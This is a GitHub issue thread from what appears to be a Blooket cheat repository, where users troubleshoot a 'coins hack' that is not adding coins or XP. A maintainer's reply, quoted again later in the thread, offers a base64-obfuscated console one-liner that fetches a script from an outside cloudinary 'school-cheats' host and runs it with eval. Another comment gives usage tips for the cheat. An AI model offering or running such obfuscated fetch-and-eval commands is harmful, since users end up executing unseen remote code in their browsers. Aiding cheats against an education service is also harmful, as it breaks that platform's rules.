### ISSUE TITLE
Coins hack is not working, coins and XP are staying the same

### ISSUE THREAD

**Issue by syphn** [glixzzy/blooket-hack#593]
either im doing it too fast before the cooldown ends, or its just the thing being buggy

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by glixzzy** [comment]
just worked for me.

**Comment by donaldli2020** [comment]
> **Hello there!**
> 
> Your issue is not complete and we can not tell the problem!
> 
> Here are some questions you should answer when creating an issue:
> 
> * What browser do you use?
> * Are you on a school computer and/or connected to the school internet?
> * Are you using a bookmarklet or are you pasting the code into the console?
> * Has the code worked before?
> * Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`
> 
> Thank you for letting us know the issue! 😀

is this an auto reply i feel so

**Comment by donaldli2020** [comment]
> either im doing it too fast before the cooldown ends, or its just the thing being buggy

at the stats tab make sure u have >= 1 daily tokens left
dont exceed the limit
